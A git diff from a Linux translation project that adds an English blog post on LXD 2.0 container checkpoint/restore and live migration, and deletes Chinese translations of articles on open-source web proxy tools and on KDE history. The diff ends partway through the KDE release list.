+The main LXD website is at: https://linuxcontainers.org/lxd
+Development happens on Github at: https://github.com/lxc/lxd
+Mailing-list support happens on: https://lists.linuxcontainers.org
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/04/14/lxd-2-0-lxd-in-lxd-812/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://www.stgraber.org/2016/04/13/lxd-2-0-docker-in-lxd-712/
+[2]: https://linuxcontainers.org/lxd/try-it/
+[3]: https://www.stgraber.org/2016/03/26/lxd-2-0-resource-control-412/
diff --git a/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md b/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md
new file mode 100644
index 0000000000..51f9c8b1a7
--- /dev/null
+++ b/sources/tech/LXD/Part 9 - LXD 2.0--Live migration.md
@@ -0,0 +1,328 @@
+Part 9 - LXD 2.0: Live migration
+=================================
+
+This is the ninth blog post [in this series about LXD 2.0][0].
+
+![](https://linuxcontainers.org/static/img/containers.png)
+
+### Introduction
+
+One of the most exciting features of LXD 2.0, albeit experimental, is the support for container checkpoint and restore.
+
+Simply put, checkpoint/restore means that the running container state can be serialized down to disk and then restored, either on the same host (as a stateful snapshot of the container) or on another host (which equates to live migration).
+
+### Requirements
+
+To have access to container live migration and stateful snapshots, you need the following:
+
+- A very recent Linux kernel, 4.4 or higher.
+- CRIU 2.0, possibly with some cherry-picked commits depending on your exact kernel configuration.
+- LXD running directly on the host. It’s not possible to use those features with container nesting.
+- For migration, the target machine must at least implement the instruction set of the source, the target kernel must at least offer the same syscalls as the source and any kernel filesystem which was mounted on the source must also be mountable on the target.
+
+All the needed dependencies are provided by Ubuntu 16.04 LTS, in which case all you need to do is install CRIU itself:
+
+```
+apt install criu
+```
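+
+CRIU ships its own feature probe which checks your running kernel for everything it needs; running it after installation is a good way to catch missing kernel support early (the exact output depends on your kernel configuration):
+
+```
+criu check
+```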
+
+### Using the thing
+
+#### Stateful snapshots
+
+A normal container snapshot looks like:
+
+```
+stgraber@dakara:~$ lxc snapshot c1 first
+stgraber@dakara:~$ lxc info c1 | grep first
+ first (taken at 2016/04/25 19:35 UTC) (stateless)
+```
+
+A stateful snapshot instead looks like:
+
+```
+stgraber@dakara:~$ lxc snapshot c1 second --stateful
+stgraber@dakara:~$ lxc info c1 | grep second
+ second (taken at 2016/04/25 19:36 UTC) (stateful)
+```
+
+This means that all the container runtime state was serialized to disk and included as part of the snapshot. Restoring one such snapshot is done as you would a stateless one:
+
+```
+stgraber@dakara:~$ lxc restore c1 second
+stgraber@dakara:~$
+```
+
+#### Stateful stop/start
+
+Say you want to reboot your server for a kernel update or similar maintenance. Rather than have to wait for all the containers to start from scratch after reboot, you can do:
+
+```
+stgraber@dakara:~$ lxc stop c1 --stateful
+```
+
+The container state will be written to disk and then picked up the next time you start it.
+
+You can even look at what the state looks like:
+
+```
+root@dakara:~# tree /var/lib/lxd/containers/c1/rootfs/state/
+/var/lib/lxd/containers/c1/rootfs/state/
+├── cgroup.img
+├── core-101.img
+├── core-102.img
+├── core-107.img
+├── core-108.img
+├── core-109.img
+├── core-113.img
+├── core-114.img
+├── core-122.img
+├── core-125.img
+├── core-126.img
+├── core-127.img
+├── core-183.img
+├── core-1.img
+├── core-245.img
+├── core-246.img
+├── core-50.img
+├── core-52.img
+├── core-95.img
+├── core-96.img
+├── core-97.img
+├── core-98.img
+├── dump.log
+├── eventfd.img
+├── eventpoll.img
+├── fdinfo-10.img
+├── fdinfo-11.img
+├── fdinfo-12.img
+├── fdinfo-13.img
+├── fdinfo-14.img
+├── fdinfo-2.img
+├── fdinfo-3.img
+├── fdinfo-4.img
+├── fdinfo-5.img
+├── fdinfo-6.img
+├── fdinfo-7.img
+├── fdinfo-8.img
+├── fdinfo-9.img
+├── fifo-data.img
+├── fifo.img
+├── filelocks.img
+├── fs-101.img
+├── fs-113.img
+├── fs-122.img
+├── fs-183.img
+├── fs-1.img
+├── fs-245.img
+├── fs-246.img
+├── fs-50.img
+├── fs-52.img
+├── fs-95.img
+├── fs-96.img
+├── fs-97.img
+├── fs-98.img
+├── ids-101.img
+├── ids-113.img
+├── ids-122.img
+├── ids-183.img
+├── ids-1.img
+├── ids-245.img
+├── ids-246.img
+├── ids-50.img
+├── ids-52.img
+├── ids-95.img
+├── ids-96.img
+├── ids-97.img
+├── ids-98.img
+├── ifaddr-9.img
+├── inetsk.img
+├── inotify.img
+├── inventory.img
+├── ip6tables-9.img
+├── ipcns-var-10.img
+├── iptables-9.img
+├── mm-101.img
+├── mm-113.img
+├── mm-122.img
+├── mm-183.img
+├── mm-1.img
+├── mm-245.img
+├── mm-246.img
+├── mm-50.img
+├── mm-52.img
+├── mm-95.img
+├── mm-96.img
+├── mm-97.img
+├── mm-98.img
+├── mountpoints-12.img
+├── netdev-9.img
+├── netlinksk.img
+├── netns-9.img
+├── netns-ct-9.img
+├── netns-exp-9.img
+├── packetsk.img
+├── pagemap-101.img
+├── pagemap-113.img
+├── pagemap-122.img
+├── pagemap-183.img
+├── pagemap-1.img
+├── pagemap-245.img
+├── pagemap-246.img
+├── pagemap-50.img
+├── pagemap-52.img
+├── pagemap-95.img
+├── pagemap-96.img
+├── pagemap-97.img
+├── pagemap-98.img
+├── pages-10.img
+├── pages-11.img
+├── pages-12.img
+├── pages-13.img
+├── pages-1.img
+├── pages-2.img
+├── pages-3.img
+├── pages-4.img
+├── pages-5.img
+├── pages-6.img
+├── pages-7.img
+├── pages-8.img
+├── pages-9.img
+├── pipes-data.img
+├── pipes.img
+├── pstree.img
+├── reg-files.img
+├── remap-fpath.img
+├── route6-9.img
+├── route-9.img
+├── rule-9.img
+├── seccomp.img
+├── sigacts-101.img
+├── sigacts-113.img
+├── sigacts-122.img
+├── sigacts-183.img
+├── sigacts-1.img
+├── sigacts-245.img
+├── sigacts-246.img
+├── sigacts-50.img
+├── sigacts-52.img
+├── sigacts-95.img
+├── sigacts-96.img
+├── sigacts-97.img
+├── sigacts-98.img
+├── signalfd.img
+├── stats-dump
+├── timerfd.img
+├── tmpfs-dev-104.tar.gz.img
+├── tmpfs-dev-109.tar.gz.img
+├── tmpfs-dev-110.tar.gz.img
+├── tmpfs-dev-112.tar.gz.img
+├── tmpfs-dev-114.tar.gz.img
+├── tty.info
+├── unixsk.img
+├── userns-13.img
+└── utsns-11.img
+
+0 directories, 154 files
+```
+
+Restoring the container can be done with a simple:
+
+```
+stgraber@dakara:~$ lxc start c1
+```
+
+### Live migration
+
+Live migration is basically the same as the stateful stop/start above, except that the container directory and configuration happen to be moved to another machine too.
+
+```
+stgraber@dakara:~$ lxc list c1
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2 |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+
+stgraber@dakara:~$ lxc list s-tollana:
++------+-------+------+------+------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+-------+------+------+------+-----------+
+
+stgraber@dakara:~$ lxc move c1 s-tollana:
+
+stgraber@dakara:~$ lxc list c1
++------+-------+------+------+------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+-------+------+------+------+-----------+
+
+stgraber@dakara:~$ lxc list s-tollana:
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2 |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+```
+
+### Limitations
+
+As I said before, checkpoint/restore of containers is still pretty new and we’re still very much working on this feature, fixing issues as we are made aware of them. We do need more people trying this feature and sending us feedback; I would however not recommend using this in production just yet.
+
+The current list of issues we’re tracking is [available on Launchpad][1].
+
+We expect a basic Ubuntu container with a few services to work properly with CRIU in Ubuntu 16.04. However, more complex containers, using device passthrough, complex network services or special storage configurations, are likely to fail.
+
+Whenever possible, CRIU will fail at dump time, rather than at restore time. In such cases, the source container will keep running, the snapshot or migration will simply fail and a log file will be generated for debugging.
+
+In rare cases, CRIU fails to restore the container, in which case the source container will still be around but will be stopped and will have to be manually restarted.
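+
+In both failure cases, the CRIU log is the first thing to look at. Based on the state directory shown earlier, a minimal sketch for inspecting the dump log of a dir-backed container named c1 (paths will differ with other storage backends):
+
+```
+grep -i error /var/lib/lxd/containers/c1/rootfs/state/dump.log
+```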
+
+### Sending bug reports
+
+We’re tracking bugs related to checkpoint/restore against the CRIU Ubuntu package on Launchpad. Most of the work to fix those bugs will then happen upstream either on CRIU itself or the Linux kernel, but it’s easier for us to track things this way.
+
+To file a new bug report, [head here][3].
+
+Please make sure to include:
+
+- The command you ran and the error message as displayed to you
+- Output of “lxc info” (*)
+- Output of “lxc info <container name>”
+- Output of “lxc config show --expanded <container name>”
+- Output of “dmesg” (*)
+- Output of “/proc/self/mountinfo” (*)
+- Output of “lxc exec <container name> -- cat /proc/self/mountinfo”
+- Output of “uname -a” (*)
+- The content of /var/log/lxd.log (*)
+- The content of /etc/default/lxd-bridge (*)
+- A tarball of /var/log/lxd/<container name>/ (*)
+
+If reporting a migration bug as opposed to a stateful snapshot or stateful stop bug, please include the data for both the source and target for any of the above which has been marked with a (*).
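+
+If you’d like to script collecting most of those items, the sketch below gathers them into a tarball (a hypothetical helper, not part of LXD; adjust the container name to your setup):
+
+```
+#!/bin/sh
+# Gather LXD/CRIU debugging information for a bug report.
+CONTAINER=c1
+OUT=$(mktemp -d)
+lxc info > "$OUT/lxc-info.txt"
+lxc info "$CONTAINER" > "$OUT/lxc-info-container.txt"
+lxc config show --expanded "$CONTAINER" > "$OUT/lxc-config.txt"
+dmesg > "$OUT/dmesg.txt"
+cat /proc/self/mountinfo > "$OUT/mountinfo.txt"
+lxc exec "$CONTAINER" -- cat /proc/self/mountinfo > "$OUT/mountinfo-container.txt"
+uname -a > "$OUT/uname.txt"
+cp /var/log/lxd.log /etc/default/lxd-bridge "$OUT/" 2>/dev/null
+cp -r "/var/log/lxd/$CONTAINER" "$OUT/lxd-logs" 2>/dev/null
+tar -czf lxd-bug-report.tar.gz -C "$OUT" .
+echo "Wrote lxd-bug-report.tar.gz"
+```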
+
+### Extra information
+
+The CRIU website can be found at: https://criu.org
+
+The main LXD website is at: https://linuxcontainers.org/lxd
+
+Development happens on Github at: https://github.com/lxc/lxd
+
+Mailing-list support happens on: https://lists.linuxcontainers.org
+
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/04/25/lxd-2-0-live-migration-912/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://bugs.launchpad.net/ubuntu/+source/criu/+bugs
+[3]: https://launchpad.net/ubuntu/+source/criu/+filebug?no-redirect
diff --git a/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md b/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md
deleted file mode 100644
index 21fd8ad8e2..0000000000
--- a/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md
+++ /dev/null
@@ -1,195 +0,0 @@
-使用开源工具优化Web响应
-================================================================================
-Web代理软件转发HTTP请求时并不会改变数据流量。它们经过配置后,可以免客户端配置,作为透明代理。它们还可以作为网站反向代理的前端;缓存服务器在此能支撑一台或多台web服务器为海量用户提供服务。
-
-网站代理功能多样,有着宽泛的用途:从页面缓存、DNS和其他查询,到加速web服务器响应、降低带宽消耗。代理软件广泛用于大型高访问量的网站,比如纽约时报、卫报, 以及社交媒体网站如Twitter、Facebook和Wikipedia。
-
-页面缓存已经成为优化单位时间内所能吞吐的数据量的至关重要的机制。好的Web缓存还能降低延迟,尽可能快地响应页面,让终端用户不至于因等待内容的时间过久而失去耐心。它们还能将频繁访问的内容缓存起来以节省带宽。如果你需要降低服务器负载并改善网站内容响应速度,那缓存软件能带来的好处就绝对值得探索一番。
-
-为深入探查Linux下可用的相关软件的质量,我列出了下边5个优秀的开源web代理工具。它们中有些功能完备强大,也有几个只需很低的资源就能运行。
-
-### Squid ###
-
-Squid是一个高性能、开源的代理缓存和Web缓存服务器,支持FTP、Internet Gopher、HTTPS和SSL等多种协议。它通过一个非阻塞,I/O事件驱动的单一进程处理所有IPV4或IPV6上的请求。
-
-Squid由一个主服务程序squid,和DNS查询程序dnsserver,另外还有可选的请求重写、执行认证程序组件,及一些管理和客户端工具构成。
-
-Squid提供了丰富的访问控制、认证和日志环境, 用于开发web代理和内容服务网站应用。
-
-其特性包括:
-
-- Web代理:
- - 通过缓存来降低访问时间和带宽使用
- - 将元数据和特别热的对象缓存到内存中
- - 缓存DNS查询
- - 支持非阻塞的DNS查询
- - 实现了失败请求的未果缓存
-- Squid缓存可架设为层次结构,或网状结构以节省额外的带宽
-- 通过可扩展的访问控制来执行网站使用条款
-- 隐匿请求,如禁用或修改客户端HTTP请求头特定属性
-- 反向代理
-- 媒体范围限制
-- 支持SSL
-- 支持IPv6
-- 错误页面的本地化 - Squid可以根据访问者的语言选项对每个请求展示本地化的错误页面
-- 连接Pinning(用于NTLM Auth Passthrough) - 一种通过Web代理,允许Web服务器使用Microsoft NTLM安全认证替代HTTP标准认证的方案
-- 支持服务质量 (QoS, Quality of Service) 流
- - 选择一个TOS/Diffserv值来标记本地命中
- - 选择一个TOS/Diffserv值来标记邻居命中
- - 选择性地仅标记同级或上级请求
- - 允许任意发往客户端的HTTP响应保持由远程服务器处响应的TOS值
- - 对收到的远程服务器的TOS值,在复制之前对指定位进行掩码操作,再发送到客户端
-- SSL Bump (用于HTTPS过滤和适配) - Squid-in-the-middle,在CONNECT方式的SSL隧道中,用配置化的客户端和服务器端证书,对流量进行解密和加密
-- 支持适配模块
-- ICAP旁路和重试增强 - 通过完全的旁路和动态链式路由扩展ICAP,来处理多多个适应性服务。
-- 支持ICY流式协议 - 俗称SHOUTcast多媒体流
-- 动态SSL证书生产
-- 支持ICAP协议(Internet Content Adaptation Protocol)
-- 完整的请求日志记录
-- 匿名连接
-
-- 网站: [www.squid-cache.org][1]
-- 开发: 美国国家应用网络研究实验室和网络志愿者
-- 授权: GNU GPL v2
-- 版本号: 4.0.1
-
-### Privoxy ###
-
-Privoxy(Privacy Enhancing Proxy)是一个非缓存类Web代理软件,它自带的高级过滤功能用来增强隐私保护,修改页面内容和HTTP头部信息,访问控制,以及去除广告和其它招人反感的互联网垃圾。Privoxy的配置非常灵活,能充分定制已满足各种各样的需求和偏好。它支持单机和多用户网络两种模式。
-
-Privoxy使用Actions规则来处理浏览器和远程站点间的数据流。
-
-其特性包括:
-
-- 高度配置化
-- 广告拦截
-- Cookie管理
-- 支持"Connection: keep-alive"。可以无视客户端配置而保持持久连接
-- 支持IPv6
-- 标签化,允许按照客户端和服务器的请求头进行处理
-- 作为拦截代理器运行
-- 巧妙的手段和过滤机制用来处理服务器和客户端的HTTP头部
-- 可以与其他代理软件链式使用
-- 整合了基于浏览器的配置和控制工具,能在线跟踪规则和过滤效果,可远程开关
-- 页面过滤(文本替换、根据尺寸大小删除广告栏, 隐藏的"web-bugs"元素和HTML容错等)
-- 模块化的配置使得标准配合和用户配置可以存放于不同文件中,这样安装更新就不会覆盖用户的个性化设置
-- 配置文件支持Perl兼容的正则表达式,以及更为精妙和灵活的配置语法
-- GIF去动画
-- 旁路处理大量click-tracking脚本(避免脚本重定向)
-- 大多数代理生成的页面(例如 "访问受限" 页面)可由用户自定义HTML模板
-- 自动监测配置文件的修改并重新读取
-- 最大特点是可以基于每个站点或每个位置来进行控制
-
-- 网站: [www.privoxy.org][2]
-- 开发: Fabian Keil(开发领导者), David Schmidt, 和众多其他贡献者
-- 授权: GNU GPL v2
-- 版本号: 3.4.2
-
-### Varnish Cache ###
-
-Varnish Cache是一个为性能和灵活性而生的web加速器。它新颖的架构设计能带来显著的性能提升。根据你的架构,通常情况下它能加速响应速度300-1000倍。Varnish将页面存储到内存,这样web服务器就无需重复地创建相同的页面,只需要在页面发生变化后重新生成。页面内容直接从内存中访问,当然比其他方式更快。
-
-此外Varnish能大大提升响应web页面的速度,用任何应用服务器都能使网站访问速度大幅度地提升。
-
-按按经验,Varnish Cache比较经济的配置是1-16GB内存+SSD固态硬盘。
-
-其特性包括:
-
-- 新颖的设计
-- VCL - 非常灵活的配置语言。VCL配置转换成C,然后编译、加载、运行,灵活且高效
-- 能使用round-robin轮询和随机分发两种方式来负载均衡,两种方式下后端服务器都可以设置权重
-- 基于DNS、随机、散列和客户端IP的分发器
-- 多台后端主机间的负载均衡
-- 支持Edge Side Includes,包括拼装压缩后的ESI片段
-- 多线程并发
-- URL重写
-- 单Varnish缓存多个虚拟主机
-- 日志数据存储在共享内存中
-- 基本的后端服务器健康检查
-- 优雅地处理后端服务器“挂掉”
-- 命令行界面的管理控制台
-- 使用内联C来扩展Varnish
-- 可以与Apache用在相同的系统上
-- 单系统可运行多个Varnish
-- 支持HAProxy代理协议。该协议在每个收到的TCP请求,例如SSL终止过程中,附加小段头信息,以记录客户端的真实地址
-- 冷热VCL状态
-- 用名为VMODs的Varnish模块来提供插件扩展
-- 通过VMODs定义后端主机
-- Gzip压缩及解压
-- HTTP流通过和获取
-- 神圣模式和优雅模式。用Varnish作为负载均衡器,神圣模式下可以将不稳定的后端服务器在一段时间内打入黑名单,阻止它们继续提供流量服务。优雅模式允许Varnish在获取不到后端服务器状态良好的响应时,提供已过期版本的页面或其它内容。
-- 实验性支持持久化存储,无需LRU缓存淘汰
-
-- 网站: [www.varnish-cache.org][3]
-- 开发: Varnish Software
-- 授权: FreeBSD
-- 版本号: 4.1.0
-
-### Polipo ###
-
-Polipo是一个开源的HTTP缓存代理,只需要非常低的资源开销。
-
-它监听来自浏览器的web页面请求,转发到web服务器,然后将服务器的响应转发到浏览器。在此过程中,它能优化和整形网络流量。从本质来讲Polipo与WWWOFFLE很相似,但其实现技术更接近于Squid。
-
-Polipo最开始的目标是作为一个兼容HTTP/1.1的代理,理论它能在任何兼容HTTP/1.1或更早的HTTP/1.0的站点上运行。
-
-其特性包括:
-
-- HTTP 1.1、IPv4 & IPv6、流量过滤和隐私保护增强
-- 如确认远程服务器支持,则无论收到的请求是管道处理过的还是在多个连接上同时收到的,都使用HTTP/1.1管道
-- 下载被中断时缓存起始部分,当需要续传时用区间请求来完成下载
-- 将HTTP/1.0的客户端请求升级为HTTP/1.1,然后按照客户端支持的级别进行升级或降级后回复
-- 全面支持IPv6 (作用域(链路本地)地址除外)
-- 作为IPv4和IPv6网络的网桥
-- 内容过滤
-- 能使用Poor Man多路复用技术降低延迟
-- 支持SOCKS 4和SOCKS 5协议
-- HTTPS代理
-- 扮演透明代理的角色
-- 可以与Privoxy或tor一起运行
-
-- 网站: [www.pps.univ-paris-diderot.fr/~jch/software/polipo/][4]
-- 开发: Juliusz Chroboczek, Christopher Davis
-- 授权: MIT License
-- 版本号: 1.1.1
-
-### Tinyproxy ###
-
-Tinyproxy是一个轻量级的开源web代理守护进程,其设计目标是快而小。它适用于需要完整HTTP代理特性,但系统资源又不足以运行大型代理的场景,比如嵌入式部署。
-
-Tinyproxy对小规模网络非常有用,这样的场合下大型代理会使系统资源紧张,或有安全风险。Tinyproxy的一个关键特性是其缓冲连接的理念。实质上Tinyproxy服务器的响应进行了高速缓冲,然后按照客户端能够处理的最高速度进行响应。该特性极大的降低了网络延滞带来的问题。
-
-特性:
-
-- 易于修改
-- 隐匿模式 - 定义哪些HTTP头允许通过,哪些又会被拦截
-- 支持HTTPS - Tinyproxy允许通过CONNECT方法转发HTTPS连接,任何情况下都不会修改数据流量
-- 远程监控 - 远程访问代理统计数据,让你能清楚了解代理服务当前的忙碌状态
-- 平均负载监控 - 通过配置,当服务器的负载接近一定值后拒绝新连接
-- 访问控制 - 通过配置,仅允许指定子网或IP地址的访问
-- 安全 - 运行无需额外权限,减小了系统受到威胁的概率
-- 基于URL的过滤 - 允许基于域和URL的黑白名单
-- 透明代理 - 配位为透明代理,这样客户端就无需任何配置
-- 代理链 - 来流量出口处采用上游代理服务器,而不是直接转发到目标服务器,创建我们所说的代理链
-- 隐私特性 - 限制允许从浏览器收到的来自HTTP服务器的数据(例如cookies),同时限制允许通过的从浏览器到HTTP服务器的数据(例如版本信息)
-- 低开销 - 使用glibc内存开销只有2MB,CPU负载按并发连接数线性增长(取决于网络连接速度)。 Tinyproxy可以运行在老旧的机器上而无需担心性能问题。
-
-- 网站: [banu.com/tinyproxy][5]
-- 开发: Robert James Kaes和其他贡献者
-- 授权: GNU GPL v2
-- 版本号: 1.8.3
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxlinks.com/article/20151101020309690/WebDelivery.html
-
-译者:[fw8899](https://github.com/fw8899)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://www.squid-cache.org/
-[2]:http://www.privoxy.org/
-[3]:https://www.varnish-cache.org/
-[4]:http://www.pps.univ-paris-diderot.fr/%7Ejch/software/polipo/
-[5]:https://banu.com/tinyproxy/
diff --git a/translated/talk/20101020 19 Years of KDE History--Step by Step.md b/translated/talk/20101020 19 Years of KDE History--Step by Step.md
deleted file mode 100644
index ef90acd91f..0000000000
--- a/translated/talk/20101020 19 Years of KDE History--Step by Step.md
+++ /dev/null
@@ -1,209 +0,0 @@
-# 19年KDE进化历程
-注:youtube 视频
-
-
-## 概述
-KDE – 史上功能最强大的桌面环境之一; 开源且免费。19年前,1996年10月14日,德国程序员 Matthias Ettrich 开始了编写这个美观的桌面环境。KDE提供了诸如shell以及其他很多日常使用的程序。今日,KDE被成千上万人在 Unix 和 Windows 上使用。19年----一个对软件项目而言极为漫长的年岁。现在是时候让我们回到最初,看看这一切从哪里开始了。
-
-K Desktop Environment(KDE)有很多创新之处:新设计,美观,连贯性,易于使用,对普通用户和专业用户都足够强大的应用库。"KDE"这个名字是对单词"通用桌面环境"(Common Desktop Environment)玩的一个简单谐音游戏,"K"----"Cool"。 第一代KDE在双证书授权下使用了有专利的 Trolltech's Qt 框架 (现Qt的前身),这两个许可证分别是 open source QPL(Q public license) 和 商业专利许可证(proprietary commercial license)。在2000年 Trolltech 让一部分 Qt 软件库开始发布在 GPL 证书下; Qt 4.5 发布在了 LGPL 2.1 许可证下。自2009起 KDE 桌面环境由三部分构成:Plasma Workspaces (作Shell),KDE 应用,作为 KDE Software 编译的 KDE Platform.
-
-## 各发布版本
-### Pre-Release – 1996年10月14日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/0b3.png)
-
-当时名称为 Kool Desktop Environment;"Kool"这个单词在很快就被弃用了。最初,所有KDE的组件都是被单独发布在开发社区里的,他们之间没有任何环绕大项目的组装配合。开发组邮件列表中的第一封通信是发往kde@fiwi02.wiwi.uni-Tubingen.de 的邮件。
-
-### KDE 1.0 – 1998年7月12日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/10.png)
-
-这个版本受到了颇有争议的反馈。很多人反对使用Qt框架----当时的 FreeQt 许可证和自由软件许可证并不兼容----并建议开发组使用 Motif 或者 LessTif 替代。尽管有着这些反对声,KDE 仍然被很多用户所青睐,并且成功作为第一个Linux发行版的环境被集成了进去。(made its way into the first Linux distributions)
-
-![28 January 1999](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/11.png)
-
-1999年1月28日
-
-一次升级,**K Desktop Environment 1.1**,更快,更稳定的同时加入了很多小升级。这个版本同时也加入了很多新的图标,背景,外观文理。和这些全面翻新同时出现的还有 Torsten Rahn 绘制的全新KDE图标----齿轮前的3个K字母;这个图标的修改版也一直沿用至今。
-
-### KDE 2.0 – 2000年10月23日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/20.png)
-
-重大更新:_ DCOP (Desktop COmmunication Protocol),一个端到端的通信协议 _ KIO,一个应用程序I/O库 _ KParts,组件对象模板 _ KHTML,一个符合 HTML 4.0 标准的图像绘制引擎。
-
-![26 February 2001](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/21.png)
-
-2001年2月26日
-
-**K Desktop Environment 2.1** 首次发布了媒体播放器 noatun,noatun使用了先进的模组-插件设计。为了便利开发者,K Desktop Environment 2.1 打包了 KDevelop
-
-![15 August 2001](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/22.png)
-
-2001年8月15日
-
-**KDE 2.2**版本在GNU/Linux上加快了50%的应用启动速度,同时提高了稳定性和 HTML、JavaScript的解析性能,同时还增加了一些 KMail 的功能。
-
-### KDE 3.0 – 2002年4月3日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/30.png)
-
-K Desktop Environment 3.0 加入了更好的限制使用功能,这个功能在网咖,企业公用电脑上被广泛需求。
-
-![28 January 2003](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/31.png)
-
-2003年1月28日
-
-**K Desktop Environment 3.1** 加入了新的默认窗口(Keramik)和图标样式(Crystal)和其他一些改进。
-
-![3 February 2004](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/32.png)
-
-2004年2月3日
-
-**K Desktop Environment 3.2** 加入了诸如网页表格,书写邮件中拼写检查的新功能;补强了邮件和日历功能。完善了Konqueror 中的标签机制和对 Microsoft Windows 桌面共享协议的支持。
-
-![19 August 2004](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/33.png)
-
-2004年8月19日
-
-**K Desktop Environment 3.3** 侧重于组合不同的桌面组件。Kontact 被放进了群件应用Kolab 并与 Kpilot 结合。Konqueror 的加入让KDE有了更好的 IM 交流功能,比如支持发送文件,以及其他 IM 协议(如IRC)的支持。
-
-![16 March 2005](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/34.png)
-
-2005年3月16日
-
-**K Desktop Environment 3.4** 侧重于提高易用性。这次更新为Konqueror,Kate,KPDF加入了文字-语音转换功能;也在桌面系统中加入了独立的 KSayIt 文字-语音转换软件。
-
-![29 November 2005](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/35.png)
-
-2005年11月29日
-
-**The K Desktop Environment 3.5** 发布加入了 SuperKaramba,为桌面环境提供了易于安装的插件机制。 desktop. Konqueror 加入了广告屏蔽功能并成为了有史以来第二个通过Acid2 CSS 测试的浏览器。
-
-### KDE SC 4.0 – 2008年1月11日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/400.png)
-
-大部分开组投身于把最新的技术和开发框架整合进 KDE 4 当中。Plasma 和 Oxygen 是两次最大的用户界面风格变更。同时,Dolphin 替代 Konqueror 成为默认文件管理器,Okular 成为了默认文档浏览器。
-
-![29 July 2008](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/401.png)
-
-2008年7月29日
-
-**KDE 4.1** 引入了一个在 PIM 和 Kopete 中使用的表情主题系统;引入了可以让用户便利地从互联网上一键下载数据的DXS。同时引入了 GStreamer,QuickTime,和 DirectShow 9 Phonon 后台。加入了新应用如:_ Dragon Player _ Kontact _ Skanlite – 扫描仪软件,_ Step – 物理模拟软件 * 新游戏: Kdiamond,Kollision,KBreakout 和更多......
-
-![27 January 2009](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/402.png)
-
-2009年1月27日
-
-**KDE 4.2** 被认为是在已经极佳的 KDE 4.1 基础上的又一次全面超越,同时也成为了大多数用户替换旧 3.5 版本的完美选择。
-
-![4 August 2009](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/403.png)
-
-2009年8月4日
-
-**KDE 4.3** 修复了超过10,000个 bugs,同时加入了让近2,000个被用户需求的功能。整合一些新的技术例如:PolicyKit,NetworkManage & Geolocation services 等也是这个版本的一大重点。
-
-![9 February 2010](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/404.png)
-
-2010年2月9日
-
-**KDE SC 4.4** 基础 Qt 4 开框架的 4.6 版本,新的应用 KAddressBook 被加入,同时也是is based on version 4.6 of the Qt 4 toolkit. New application – KAddressBook,Kopete首次发布。
-
-![10 August 2010](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/405.png)
-
-2010年8月10日
-
-**KDE SC 4.5** 增加了一些新特性:整合了 WebKit 库----一个开源的浏览器引擎库,现在也被在 Apple Safari 和 Google Chrome 中广泛使用。KPackageKit 替换了 Kpackage。
-
-![26 January 2011](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/406.png)
-
-2011年1月26日
-
-**KDE SC 4.6** 加强了 OpenGl 的性能,同时照常更新了无数bug和小改进。
-
-![27 July 2011](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/407.png)
-
-2011年7月27日
-
